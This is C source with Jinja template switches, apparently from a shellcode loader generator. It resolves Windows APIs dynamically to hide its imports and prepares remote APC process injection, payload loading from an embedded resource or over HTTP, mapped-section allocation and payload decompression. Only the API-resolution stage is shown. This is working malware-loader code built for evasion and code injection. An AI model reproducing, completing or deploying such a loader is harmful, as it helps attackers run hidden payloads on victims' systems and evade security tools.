// --- 1. Define Typedefs for all required function pointers ---
typedef HMODULE (WINAPI *pGetModuleHandleA)(LPCSTR);
typedef FARPROC (WINAPI *pGetProcAddress)(HMODULE, LPCSTR);
typedef HMODULE (WINAPI *pLoadLibraryA)(LPCSTR);
typedef LPVOID (WINAPI *pVirtualAlloc)(LPVOID, SIZE_T, DWORD, DWORD);
typedef HANDLE (WINAPI *pCreateThread)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
typedef VOID (WINAPI *pRtlMoveMemory)(VOID UNALIGNED *, const VOID UNALIGNED *, SIZE_T);
typedef DWORD (WINAPI *pWaitForSingleObject)(HANDLE, DWORD);
typedef BOOL (WINAPI *pCloseHandle)(HANDLE);
typedef HANDLE (WINAPI *pCreateFileMappingW)(HANDLE, LPSECURITY_ATTRIBUTES, DWORD, DWORD, DWORD, LPCWSTR);
typedef LPVOID (WINAPI *pMapViewOfFile)(HANDLE, DWORD, DWORD, DWORD, SIZE_T);
typedef HANDLE (WINAPI *pGetProcessHeap)(VOID);
typedef LPVOID (WINAPI *pHeapAlloc)(HANDLE, DWORD, SIZE_T);
typedef BOOL (WINAPI *pHeapFree)(HANDLE, DWORD, LPVOID);
typedef BOOL (WINAPI *pCreateDecompressor)(DWORD, PVOID, PDECOMPRESSOR_HANDLE);
typedef BOOL (WINAPI *pDecompress)(DECOMPRESSOR_HANDLE, LPCVOID, SIZE_T, PVOID, SIZE_T, PSIZE_T);
typedef BOOL (WINAPI *pCloseDecompressor)(DECOMPRESSOR_HANDLE);
typedef HANDLE (WINAPI *pCreateFileA)(LPCSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
typedef DWORD (WINAPI *pGetFileSize)(HANDLE, LPDWORD);
typedef BOOL (WINAPI *pReadFile)(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED);
typedef VOID (WINAPI* pRtlZeroMemory)(PVOID, SIZE_T);
{% if execution_method == 'remoteapc' %}
typedef int (WINAPI* pLstrlenA)(LPCSTR);
typedef DWORD (WINAPI* pGetEnvironmentVariableA)(LPCSTR, LPSTR, DWORD);
typedef BOOL (WINAPI* pCreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);
typedef LPVOID (WINAPI* pVirtualAllocEx)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD);
typedef BOOL (WINAPI* pWriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, PSIZE_T);
typedef BOOL (WINAPI* pVirtualProtectEx)(HANDLE, LPVOID, SIZE_T, DWORD, PDWORD);
typedef DWORD (WINAPI* pQueueUserAPC)(PAPCFUNC, HANDLE, ULONG_PTR);
typedef DWORD (WINAPI* pResumeThread)(HANDLE);
typedef NTSTATUS (WINAPI* pNtCreateSection)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE);
typedef NTSTATUS (WINAPI* pNtMapViewOfSection)(HANDLE, HANDLE, PVOID*, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, UINT, ULONG, ULONG);
typedef DWORD (WINAPI* pGetLastError)(VOID);
{% endif %}
{% if data_source == 'embedded' %}
typedef HRSRC (WINAPI* pFindResourceA)(HMODULE, LPCSTR, LPCSTR);
typedef HGLOBAL (WINAPI* pLoadResource)(HMODULE, HRSRC);
typedef LPVOID (WINAPI* pLockResource)(HGLOBAL);
typedef DWORD (WINAPI* pSizeofResource)(HMODULE, HRSRC);
{% endif %}
{% if data_source == 'http' %}
typedef HINTERNET (WINAPI *pWinHttpOpen)(LPCWSTR, DWORD, LPCWSTR, LPCWSTR, DWORD);
typedef HINTERNET (WINAPI *pWinHttpConnect)(HINTERNET, LPCWSTR, INTERNET_PORT, DWORD);
typedef HINTERNET (WINAPI *pWinHttpOpenRequest)(HINTERNET, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, const LPCWSTR *, DWORD);
typedef BOOL (WINAPI *pWinHttpSendRequest)(HINTERNET, LPCWSTR, DWORD, LPVOID, DWORD, DWORD, DWORD_PTR);
typedef BOOL (WINAPI *pWinHttpReceiveResponse)(HINTERNET, LPVOID);
typedef BOOL (WINAPI *pWinHttpQueryDataAvailable)(HINTERNET, LPDWORD);
typedef BOOL (WINAPI *pWinHttpReadData)(HINTERNET, LPVOID, DWORD, LPDWORD);
typedef BOOL (WINAPI *pWinHttpCloseHandle)(HINTERNET);
typedef BOOL (WINAPI *pWinHttpCrackUrl)(LPCWSTR, DWORD, DWORD, LPURL_COMPONENTSW);
typedef BOOL (WINAPI *pWinHttpSetOption)(HINTERNET, DWORD, LPVOID, DWORD);
typedef BOOL (WINAPI *pWinHttpQueryHeaders)(HINTERNET, DWORD, LPCWSTR, LPVOID, LPDWORD, LPDWORD);
{% endif %}

// --- 2. Declare global variables to hold the resolved function pointers ---
pVirtualAlloc pfnVirtualAlloc;
pCreateThread pfnCreateThread;
pRtlMoveMemory pfnRtlMoveMemory;
pWaitForSingleObject pfnWaitForSingleObject;
pCloseHandle pfnCloseHandle;
pCreateFileMappingW pfnCreateFileMappingW;
pMapViewOfFile pfnMapViewOfFile;
pGetProcessHeap pfnGetProcessHeap;
pHeapAlloc pfnHeapAlloc;
pHeapFree pfnHeapFree;
pCreateDecompressor pfnCreateDecompressor;
pDecompress pfnDecompress;
pCloseDecompressor pfnCloseDecompressor;
pLoadLibraryA pfnLoadLibraryA;
pCreateFileA pfnCreateFileA;
pGetFileSize pfnGetFileSize;
pReadFile pfnReadFile;
pRtlZeroMemory pfnRtlZeroMemory;
{% if execution_method == 'remoteapc' %}
pLstrlenA pfnLstrlenA;
pGetEnvironmentVariableA pfnGetEnvironmentVariableA;
pCreateProcessA pfnCreateProcessA;
pVirtualAllocEx pfnVirtualAllocEx;
pWriteProcessMemory pfnWriteProcessMemory;
pVirtualProtectEx pfnVirtualProtectEx;
pQueueUserAPC pfnQueueUserAPC;
pResumeThread pfnResumeThread;
pNtCreateSection pfnNtCreateSection;
pNtMapViewOfSection pfnNtMapViewOfSection;
pGetLastError pfnGetLastError;
{% endif %}
{% if data_source == 'embedded' %}
pFindResourceA pfnFindResourceA;
pLoadResource pfnLoadResource;
pLockResource pfnLockResource;
pSizeofResource pfnSizeofResource;
{% endif %}
{% if data_source == 'http' %}
pWinHttpOpen pfnWinHttpOpen;
pWinHttpConnect pfnWinHttpConnect;
pWinHttpOpenRequest pfnWinHttpOpenRequest;
pWinHttpSendRequest pfnWinHttpSendRequest;
pWinHttpReceiveResponse pfnWinHttpReceiveResponse;
pWinHttpQueryDataAvailable pfnWinHttpQueryDataAvailable;
pWinHttpReadData pfnWinHttpReadData;
pWinHttpCloseHandle pfnWinHttpCloseHandle;
pWinHttpCrackUrl pfnWinHttpCrackUrl;
pWinHttpSetOption pfnWinHttpSetOption;
pWinHttpQueryHeaders pfnWinHttpQueryHeaders;
{% endif %}

void ResolveAPIs() {
    pGetModuleHandleA pfnGetModuleHandleA = (pGetModuleHandleA)((ULONG_PTR)GetModuleHandleA);
    pGetProcAddress pfnGetProcAddress = (pGetProcAddress)((ULONG_PTR)GetProcAddress(pfnGetModuleHandleA("kernel32.dll"), "GetProcAddress"));
    
    HMODULE hKernel32 = pfnGetModuleHandleA("kernel32.dll");
    if (hKernel32 == NULL) { return; }

    pfnLoadLibraryA = (pLoadLibraryA)pfnGetProcAddress(hKernel32, "LoadLibraryA");
    pfnVirtualAlloc = (pVirtualAlloc)pfnGetProcAddress(hKernel32, "VirtualAlloc");
    pfnCreateThread = (pCreateThread)pfnGetProcAddress(hKernel32, "CreateThread");
    pfnWaitForSingleObject = (pWaitForSingleObject)pfnGetProcAddress(hKernel32, "WaitForSingleObject");
    pfnCloseHandle = (pCloseHandle)pfnGetProcAddress(hKernel32, "CloseHandle");
    pfnCreateFileMappingW = (pCreateFileMappingW)pfnGetProcAddress(hKernel32, "CreateFileMappingW");
    pfnMapViewOfFile = (pMapViewOfFile)pfnGetProcAddress(hKernel32, "MapViewOfFile");
    pfnGetProcessHeap = (pGetProcessHeap)pfnGetProcAddress(hKernel32, "GetProcessHeap");
    pfnHeapAlloc = (pHeapAlloc)pfnGetProcAddress(hKernel32, "HeapAlloc");
    pfnHeapFree = (pHeapFree)pfnGetProcAddress(hKernel32, "HeapFree");
    pfnCreateFileA = (pCreateFileA)pfnGetProcAddress(hKernel32, "CreateFileA");
    pfnGetFileSize = (pGetFileSize)pfnGetProcAddress(hKernel32, "GetFileSize");
    pfnReadFile = (pReadFile)pfnGetProcAddress(hKernel32, "ReadFile");

    {% if execution_method == 'remoteapc' %}
    pfnLstrlenA = (pLstrlenA)pfnGetProcAddress(hKernel32, "lstrlenA");
    pfnGetEnvironmentVariableA = (pGetEnvironmentVariableA)pfnGetProcAddress(hKernel32, "GetEnvironmentVariableA");
    pfnCreateProcessA = (pCreateProcessA)pfnGetProcAddress(hKernel32, "CreateProcessA");
    pfnVirtualAllocEx = (pVirtualAllocEx)pfnGetProcAddress(hKernel32, "VirtualAllocEx");
    pfnWriteProcessMemory = (pWriteProcessMemory)pfnGetProcAddress(hKernel32, "WriteProcessMemory");
    pfnVirtualProtectEx = (pVirtualProtectEx)pfnGetProcAddress(hKernel32, "VirtualProtectEx");
    pfnQueueUserAPC = (pQueueUserAPC)pfnGetProcAddress(hKernel32, "QueueUserAPC");
    pfnResumeThread = (pResumeThread)pfnGetProcAddress(hKernel32, "ResumeThread");
    pfnGetLastError = (pGetLastError)pfnGetProcAddress(hKernel32, "GetLastError");
    {% endif %}

    {% if data_source == 'embedded' %}
    pfnFindResourceA = (pFindResourceA)pfnGetProcAddress(hKernel32, "FindResourceA");
    pfnLoadResource = (pLoadResource)pfnGetProcAddress(hKernel32, "LoadResource");
    pfnLockResource = (pLockResource)pfnGetProcAddress(hKernel32, "LockResource");
    pfnSizeofResource = (pSizeofResource)pfnGetProcAddress(hKernel32, "SizeofResource");
    {% endif %}
    
    HMODULE hNtdll = pfnGetModuleHandleA("ntdll.dll");
    if (hNtdll == NULL) { return; }
    pfnRtlMoveMemory = (pRtlMoveMemory)pfnGetProcAddress(hNtdll, "RtlMoveMemory");
    pfnRtlZeroMemory = (pRtlZeroMemory)pfnGetProcAddress(hNtdll, "RtlZeroMemory");

    {% if execution_method == 'remoteapc' or allocation_method == 'mappedsection' %}
    pfnNtCreateSection = (pNtCreateSection)pfnGetProcAddress(hNtdll, "NtCreateSection");
    pfnNtMapViewOfSection = (pNtMapViewOfSection)pfnGetProcAddress(hNtdll, "NtMapViewOfSection");
    {% endif %}

    {% if bytecode_compression == 'mszip_compressor' %}
    HMODULE hCabinet = pfnGetModuleHandleA("cabinet.dll");
    if (hCabinet == NULL && pfnLoadLibraryA != NULL) { 
        hCabinet = pfnLoadLibraryA("cabinet.dll"); 
    }
    if (hCabinet != NULL) {
        pfnCreateDecompressor = (pCreateDecompressor)pfnGetProcAddress(hCabinet, "CreateDecompressor");
        pfnDecompress = (pDecompress)pfnGetProcAddress(hCabinet, "Decompress");
        pfnCloseDecompressor = (pCloseDecompressor)pfnGetProcAddress(hCabinet, "CloseDecompressor");
    }
    {% endif %}

    {% if data_source == 'http' %}
    HMODULE hWinHttp = pfnGetModuleHandleA("winhttp.dll");
    if (hWinHttp == NULL && pfnLoadLibraryA != NULL) { hWinHttp = pfnLoadLibraryA("winhttp.dll"); }
    if (hWinHttp != NULL) {
        pfnWinHttpOpen = (pWinHttpOpen)pfnGetProcAddress(hWinHttp, "WinHttpOpen");
        pfnWinHttpConnect = (pWinHttpConnect)pfnGetProcAddress(hWinHttp, "WinHttpConnect");
        pfnWinHttpOpenRequest = (pWinHttpOpenRequest)pfnGetProcAddress(hWinHttp, "WinHttpOpenRequest");
        pfnWinHttpSendRequest = (pWinHttpSendRequest)pfnGetProcAddress(hWinHttp, "WinHttpSendRequest");
        pfnWinHttpReceiveResponse = (pWinHttpReceiveResponse)pfnGetProcAddress(hWinHttp, "WinHttpReceiveResponse");
        pfnWinHttpQueryDataAvailable = (pWinHttpQueryDataAvailable)pfnGetProcAddress(hWinHttp, "WinHttpQueryDataAvailable");
        pfnWinHttpReadData = (pWinHttpReadData)pfnGetProcAddress(hWinHttp, "WinHttpReadData");
        pfnWinHttpCloseHandle = (pWinHttpCloseHandle)pfnGetProcAddress(hWinHttp, "WinHttpCloseHandle");
        pfnWinHttpCrackUrl = (pWinHttpCrackUrl)pfnGetProcAddress(hWinHttp, "WinHttpCrackUrl");
        pfnWinHttpSetOption = (pWinHttpSetOption)pfnGetProcAddress(hWinHttp, "WinHttpSetOption");
        pfnWinHttpQueryHeaders = (pWinHttpQueryHeaders)pfnGetProcAddress(hWinHttp, "WinHttpQueryHeaders");
    }
    {% endif %}

    DEBUG_PRINT("ResolveApis: API functions resolved.");
}

